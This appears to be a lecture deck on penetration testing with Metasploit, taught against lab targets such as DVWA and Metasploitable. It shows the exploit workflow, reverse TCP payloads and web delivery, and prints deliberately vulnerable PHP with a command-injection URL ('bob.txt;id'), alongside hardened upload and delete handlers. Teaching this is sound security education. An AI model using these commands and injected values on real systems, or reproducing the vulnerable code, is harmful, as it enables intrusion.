Lecture 7 Metasploit
Uploaded by rotedi4150
Security vulnerabilities and penetration testing
Dr Phillip James
Recap and today
Last week we explored vulnerabilities and penetration techniques for:
• Web services
• Web applications

This week we will explore:
• Frameworks for penetration testing
• Some attacks they support
Penetration testing frameworks
The big ones
Metasploit: “The world’s most used platform”. Vulnerability lists, exploits, tools.

OpenVAS: A good vulnerability scanner and manager, comes with Kali.

Cobalt Strike (costs a lot) / Armitage (open source): A front-end with some extras for Metasploit. Useful for visualizing vulnerabilities.
Vulnerable systems
Metasploitable: virtual machine containing many of the below.

DVWA: Damn Vulnerable Web App. Configurable levels of security and weaknesses.

WebGoat: Another insecure web app from OWASP. Comes with tutorials!

bWAPP: An extremely buggy web app… you get the idea!

VulnHub: Many virtual machines all with various vulnerabilities.

RasPwn OS: A very insecure Raspberry Pi image.
Metasploit: the steps
One basic workflow for using Metasploit is as follows:

1. Run Metasploit.
2. Identify a remote host and add it to the Metasploit database.
3. Identify a vulnerability in the remote host that you wish to exploit and select the exploit.
4. Configure the payload to exploit the vulnerability in the remote host.
5. Execute the payload against the remote host.
Running
Assuming you’re using Kali: select Exploitation Tools -> Metasploit, or run:
msfconsole

Note: you may need to start the database service and initialize it on first run: service postgresql start, msfdb init
Identifying hosts
Run nmap, but store results in the database:
db_nmap -v -sV <ip_range>

Use “hosts” to show all found hosts.

We can still use nmap scripts to help with detection of vulnerabilities:
db_nmap -sV --script vulners <ip_address>
Pick one
Grab one of those CVE values, and simply search to see if Metasploit can help:
search <CVE or Keyword>

Use the info command to check out what the exploit does:
info <exploit_name>
Select exploit
To use that exploit:
use exploit/path/to/exploit_name
Select payload/target
List them with: show payloads

To use a payload select:
set payload <chosen_payload>

Can then also list targets (which are like parameters to the payload).
Configure payload/target
To see required configuration:
show options

To set up options:
set <option> <value>

e.g. set LHOST 192.168.1.115
Execute payload
run

Or:
exploit

Voilà!
Stuck? You can always get help:

help <command>
Demo: File upload
Simple idea
The first step in many attacks is to get some code to the system to be attacked. Then find a way to get the code executed.

Using a file upload helps the attacker accomplish the first step.

Example: wpshop plugin (2015)
• No sanitization on the file name or contents.
• This allows an attacker to upload a file with a .php extension which can then be accessed by the attacker from the web and executed.

DVWA, of course, has this.
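A hardened upload handler, added here as an illustration and not part of the lecture or of wpshop; the form field name, UPLOAD_DIR and the allowed types are assumptions. It addresses both bullets above: the file type is decided from the bytes rather than the name, the stored name is generated server-side, and the file lands outside the web root, so even a polyglot image that carries PHP is never served or executed.

```php
<?php
// Added example (not from the lecture or the wpshop plugin): a hardened
// image-upload handler. Assumptions: the form field is named "upload" and
// UPLOAD_DIR is a placeholder directory outside the web root, so nothing
// stored there can be requested, let alone executed, over HTTP.
const UPLOAD_DIR = '/var/uploads';
const MAX_BYTES  = 2 * 1024 * 1024;   // 2 MiB
// Allowed MIME types, each mapped to the extension we will assign.
const ALLOWED    = ['image/png' => 'png', 'image/jpeg' => 'jpg'];

function store_upload(array $file): string
{
    // Reject anything PHP itself flagged (partial upload, too large, ...).
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    if ($file['size'] > MAX_BYTES) {
        throw new RuntimeException('file too large');
    }
    // Decide the type from the file's bytes, never from the user-supplied
    // name or the client-reported type: "shell.php" renamed to "x.png"
    // is still rejected here.
    $finfo = new finfo(FILEINFO_MIME_TYPE);
    $mime  = $finfo->file($file['tmp_name']);
    if ($mime === false || !array_key_exists($mime, ALLOWED)) {
        throw new RuntimeException('unsupported file type');
    }
    // Choose the stored name ourselves, so "../../x.php" or "evil.php"
    // from the request never reaches the filesystem.
    $name = bin2hex(random_bytes(16)) . '.' . ALLOWED[$mime];
    $dest = UPLOAD_DIR . '/' . $name;
    // move_uploaded_file() refuses sources that are not genuine uploads.
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $name;
}

if (isset($_FILES['upload'])) {
    try {
        $stored = store_upload($_FILES['upload']);
        echo 'Stored as ' . htmlspecialchars($stored, ENT_QUOTES, 'UTF-8');
    } catch (RuntimeException $e) {
        http_response_code(400);
        echo htmlspecialchars($e->getMessage(), ENT_QUOTES, 'UTF-8');
    }
}
```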
Payload: reverse TCP
• Allows bypassing of firewalls.
• A firewall usually blocks incoming connections on open ports, but does not block outgoing traffic.
• A reverse connection avoids this but also runs the shell commands on the victim’s machine.

Attacker: “why don’t you connect to me?”
Victim connects to attacker on listening port.
Victim IP: 192.168.1.12   Attacker IP: 192.168.1.13   Listener port: 4444
Crafting with Metasploit
It works! (see demo)
Demo: Command injection
Again, simple idea
Command injection attacks are when an application passes unsafe user-supplied data to a system shell.

Example:
<?php
print("Please specify the name of the file to delete");
$file=$_GET['filename'];
system("rm $file");
?>

Attack:
http://127.0.0.1/delete.php?filename=bob.txt;id

Response:
Please specify the name of the file to delete uid=11(www-data) gid=11(www-data) groups=11(www-data)

DVWA, of course, has this.
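The same delete.php rewritten so that user input never reaches a shell, added here as an illustration and not part of the lecture or DVWA; FILES_DIR is a placeholder path and the allow-list pattern is an assumption about what file names the application needs. The `;id` from the attack above is rejected at the first check, and because the delete goes through unlink() rather than system(), there is no command line left to inject into.

```php
<?php
// Added example (not from the lecture): the delete.php from the
// command-injection slide, rewritten so user input never reaches a shell.
// Assumption: deletable files all live in FILES_DIR (a placeholder path).
const FILES_DIR = '/var/www/data';

function delete_named_file(string $requested): bool
{
    // 1. Allow-list the name: letters, digits, underscore, dash and one
    //    optional extension. "bob.txt;id", "../x", "a b" and an empty
    //    name are all rejected here, so shell metacharacters and path
    //    traversal never get any further.
    if (!preg_match('/\A[A-Za-z0-9_\-]+(\.[A-Za-z0-9]+)?\z/', $requested)) {
        return false;
    }
    // 2. Resolve the path and confirm it is still inside FILES_DIR
    //    (realpath() returns false if the file does not exist).
    $base = realpath(FILES_DIR);
    $path = realpath(FILES_DIR . '/' . $requested);
    if ($base === false || $path === false
        || strpos($path, $base . DIRECTORY_SEPARATOR) !== 0) {
        return false;
    }
    // 3. Delete with the filesystem API. No system(), so there is no
    //    command line for an attacker to append to.
    return is_file($path) && unlink($path);
}

print("Please specify the name of the file to delete\n");
$file = $_GET['filename'] ?? '';
if (delete_named_file($file)) {
    print("Deleted " . htmlspecialchars($file, ENT_QUOTES, 'UTF-8') . "\n");
} else {
    http_response_code(400);
    print("Invalid or unknown file\n");
}
```

If a shell command really is unavoidable, wrap each user-supplied argument in escapeshellarg() as well; removing the shell, as above, is the stronger fix.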
Hence! Web delivery scripts
We can now run any system command we like.

Wait… Let’s see what Metasploit offers:

“Metasploit’s Web Delivery Script is a versatile module that creates a server on the attacking machine which hosts a payload. When the victim connects to the attacking server, the payload will be executed on the victim machine.”

Crafting with Metasploit
It works! (see demo)

Note: remove the SSL stuff at the end as it is not supported in older PHP versions.
Summary
Noun: a brief statement or account of the main points of something.

We have explored penetration testing frameworks:
• Metasploit, including:
  • Running scans
  • Crafting exploits
  • Configuring payloads.
• Two more vulnerabilities:
  • Command injection
  • File uploads
• Demos with DVWA

Lab: Getting to know Metasploit and Metasploitable.

Next week: Clearing tracks and documentation.
